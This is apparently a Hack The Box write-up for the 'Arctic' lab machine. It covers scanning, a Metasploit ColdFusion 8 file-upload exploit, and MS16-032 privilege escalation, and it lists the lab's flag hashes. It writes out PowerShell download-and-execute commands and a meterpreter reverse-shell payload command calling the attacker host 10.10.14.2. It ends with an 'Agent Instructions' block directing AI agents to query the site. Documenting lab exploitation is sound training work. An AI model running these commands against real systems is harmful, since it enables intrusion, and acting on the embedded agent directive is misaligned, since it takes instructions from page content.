# Arctic

## Arctic 10.10.10.11

### Target Enumeration:

OS: Windows 2008

IP: 10.10.10.11

User: 02650d3a69a70780c302e146a6cb96f3

Root: ce65ceee66b2b5ebaff07e50508ffb90

### Ports / Services / Software Versions Running

135/tcp   open msrpc   Microsoft Windows RPC\
8500/tcp  open http    JRun Web Server\
49154/tcp open  msrpc Microsoft Windows RPC

### Vulnerability Exploited:

ColdFusion 8.0.1 Arbitrary File Upload and Execute

This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload and Execute vulnerability.

<https://www.rapid7.com/db/modules/exploit/windows/http/coldfusion_fckeditor>

### Privilege Escalation:

MS16-032 Secondary Logon Handle Privilege Escalation

This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.

### Replicating the exploit:

Nmap TCP

<div align="left"><img src="https://lh3.googleusercontent.com/rQsD9798baGCcZ9iodTNI_Rt7rDpI6tRiaRFM-MFlMyxTZKe9NT4es4m2smQiTOpCQXVA8Zja4G3G6wNh3Lo9d5VcLfsnZz_rR4alJR_Jl3X9rvt9PwOMqMLKpnaMJe9nek1s4Fi" alt=""></div>

Webapp on port 8500

<div align="left"><img src="https://lh5.googleusercontent.com/kuYTiynVBRPlkT4aQH2wqTdVDeVCskowOHtVZLa-GcfKNmuVPrRTSv-nkpcs7kdGMFF3AxSOVpMqXryiQVNSkTZDXThqwx0b_lVCKjBg7z7GcpE0P2VpRJTeM-DysrXLnW2lNDRn" alt=""></div>

Dir search

<div align="left"><img src="https://lh6.googleusercontent.com/LystpZDSRBCdo59bGUAbA8Ac9PWT4ot0_MdcEZUyUe4h2SjZIeV7s8doLKI0UanWX3o88cjE1OXMH_xXlmWLU1ipJWXoLhc6Ujx8X7FdbRV4FdI9E0vK86bcd38k8pTv2Okth5UO" alt=""></div>

Administrator gives a version 8

<div align="left"><img src="https://lh6.googleusercontent.com/8e-2EJlRxvvPoIb4H7fX5H_LezWLvIH9FFU3O8mG7IlX4oWHYoCwhJ8f7urTIIS7g797qYeYWsdPCfpi5Ph7pjYSN1dglpSqZZPSi7VfoyN2UkfA5A32IwbHgQSNAbkVxsGGwjKI" alt=""></div>

Searchsploit

![](https://lh4.googleusercontent.com/Z_OhM1ed_Qt2CwRsKwuiMEdi4iGj4jnBMwlsRcnHMMPdKkmmiv2BXDgSxB03CkQLrPm754--EuaZ2r3KwljAkZMPiPyF4TXJigpJPUJiyr0QL9BNsp3q4rN257kHBfJLxhFPiQCs)

Found the metasploit version of the exploit

<div align="left"><img src="https://lh5.googleusercontent.com/osA36gzfIIFMgYjPjt6DjVYKqzqNRLHXzz9xrXFck48Kxc-aaIN-G5fy5Bu3oqFxD8DQYh51FwWNl0_SawicVVpyqGBAy9mBeqHwvd9qd-KDJepiLmbzip9yhXvtPG944rIPdj3Z" alt=""></div>

Set options as follows

<div align="left"><img src="https://lh6.googleusercontent.com/gYAGuFA0W3gcLzYLZxxiuk4IkDQfFdHhX48_jMtkDV8OgQEZNQdQB3RolFp6djlKRoOFZdq2SR8B5dCk2yKoxj3KVX1WNL45PHENpRVeqkL6GGu9Ja2v90Nm_snJOGjJnRIReVsE" alt=""></div>

Start burp listener on port 127.0.0.1:8500\
Check it works in the browser

<div align="left"><img src="https://lh4.googleusercontent.com/1gNRkyjwYhT94tt1bONZEC1phaUstdlHB312R8zHuR_s23g0zhxYsQUoQx8wginQFg5vs6m8AtbdtgSBcu7LyreNQtA5q7Lqhdely03c3EMaiLrQalKSiSxAjaGpC0msTP1En6Gv" alt=""></div>

Capture the request in burp

<div align="left"><img src="https://lh6.googleusercontent.com/36fRpb13M5XeO4lPgDGjGCBoHDtsrSGeBec8knPv4Sv60lyzTpbmEVsF-DL1dV5cQw3dMmyusx_hQIGMXWfS-JkTp_H7c4398t9Fp8A4y38WAD4Ri0jTlbiuG6rtS2ZIyg_TXyL1" alt=""></div>

Check the filename it is writing to.

![](https://lh6.googleusercontent.com/24RTUTRPWpjrA5DSCkoeyZ1DbXLJnpNdSR7AVjSwOqzSzlPphIiWg4DDpy1WVP6C_fCB0iBNWAr9vh9KOOlPxwbmES4Df4Rx-juJHNy0qxV2LiDNa6rEfE8XKe8eflpHw0lxaOFD)

Navigate to that file via the browser and set up your nc listener on port 4444<br>

<div align="left"><img src="https://lh3.googleusercontent.com/VwnYgvV0wIZ77urrmUGOpHs8etjPpCrHmMaVYhd20dsc3-_8ADtL10oeI36D13ias0VwqoHexC4NE1S96d5lIoOfJ9qo_784mSFc88sr0vP_eHyU1hSm1JPaERJGMsFsdMato0JQ" alt=""></div>

Like so

<div align="left"><img src="https://lh5.googleusercontent.com/HbcGu6qsW2JPEiV9N5AD-xHnIWIuvzJNIXJxvpLujNpm-meSd-GNILrHU_iofLq_c8K0VndzdWtD3kzGguAYOz6z8wMr7sHo0B2SvouCuZp88HdkB_hyO9OT8-2rqveJFSqzoCks" alt=""></div>

Gather system info etc

<div align="left"><img src="https://lh4.googleusercontent.com/nFtCmR7Kt9UbqhU6NEPMppsi6K-eXGGeKsGOSNJMbBJM7JKsnCFZsg3eMVwFOyr1bkiqGV4n3IuDT4JDBXZxBs9GSgue84cD412U4QYsgiyzOW0Ab-kFsWwT_c7PcDFjOvKOFPUF" alt=""></div>

Grab user file\
Execute Sherlock.ps1 after copying it to your pwd and starting your webserver.

echo IEX(New-Object Net.WebClient).DownloadString("<http://10.10.14.2/Invoke-MS16032.ps1>") | powershell -noprofile -

Did not work so try getting a meterpreter shell instead.

git clone <https://github.com/trustedsec/unicorn.git>

python unicorn.py windows/meterpreter/reverse\_tcp 10.10.14.2 4445

msfconsole -r unicorn.rc

cat powershell\_attack.txt > exploit.html

Nano exploit.html\
Delete powershell etc to “sv including the single quote and the quote at the end.

Copy to your webserver

Run the following on Artic

powershell "iex(new-object net.webclient).downloadstring('<http://10.10.14.2/exploit.html>')"

![](https://lh4.googleusercontent.com/hly53ngzcyjgmxfDWKeX7t8UVg2OyDBchHuDaiEyjM-RVM4oH7whJeSMfboUY9wMWQb2qv2c698ggpL5CG_JlDq1TLEOXL6-9f3C0jBoxrAvujLAmPUvOmzuTzCmkZKOgwWJQPLx)

Check meterpreter

![](https://lh3.googleusercontent.com/DRMqijn08w7p5HoBftj_Cyjta8WmCL1dr5NtB9OsmPPQAwLIuvYucg78ajj2xIfMrjTVTToLXQf1oJfv11W-Ss6_T-64p2mEu26HJwDZxnd-Ovba_u2PcpF3pJA1H3Qx2dnZx86X)

Run local exploit suggester (32 bit)

![](https://lh6.googleusercontent.com/tPpB5D_TUc8OLPoRcLf3Is0HEj4PTL73ic1KcKlwM-0Tpeyur5FhzVGQWwttyGYusd8_mm-EBq7ozUUGZc3VnEwfl4tI55k6Sma8a5GRSvqNY_vGvdAFB4PyjY1Qy6sKRoKfG0Mm)

This ran as 32 bit so switch to meterpreter and change to a 64 bit process

![](https://lh3.googleusercontent.com/Gk_VU_0WPnySHy6cxBG4GjjAO_9OHxhooq40hZyNTR-u5wM1e8ktNvrGBN8_WaMXVqqUZSSB9gMDS-qL53Swv2WCHictvD_6b8MqmTF1b4L9iHjW8ytJMsmOf0kt1aAfZU5QgoqY)

Only  one as 64 bit

![](https://lh3.googleusercontent.com/irTJahshcZWGulq2uB9ZbgoZrpdXZ883WavDI1Xu5a-TQTuqVZbh5YB5q_P_G_sJO9NjgsAgvIi8MKhvuG0qmbb21pwTtwhK4eM28FSFF6fDi6Ld1YIO8yoHlhKw0sUV1EyIFdhr)

Set your options as follows:

![](https://lh6.googleusercontent.com/KuRMdA7m9uHcuhsl17__0SjlKxWizUimMVI7Lk9d0Gq8psX3j3UOEy4dttFVwt4IkHilOcxqxX_j8YbEAPJGIjV-kEAiS3SB9y6heGLe6XKZlgarb_6Ccv0EgS0xKsDWHrP1RRKf)

Run the exploit to get a system shell.

![](https://lh5.googleusercontent.com/DfzJYShYbWuoU_8xohP19Q7dig_1tDy6FJXiWWAxt1cFBSZZ710wNef4B-WvqCpQ3CbDH8H_UqKbZdx0003QmbRvLTyUXIeptXZ3LpSxdgSnciBvS3Svv69v__A4iKrYQRrlWKsd)

Root.txt

<div align="left"><img src="https://lh5.googleusercontent.com/N-U1cQPd1HK3tLN4L3QuhZgWU0WRHHCLYFrqk6xgg1Y74kATR8tnHrI5zwYCwo8nI9xLVl-FbQTDyEblkNu0ezi6kcX3Q3-pYrLML0rJ1VgEhcmkoR6Luq5AiWng99pIXW6A5xWa" alt=""></div>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.jdksec.com/hack-the-box/arctic.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.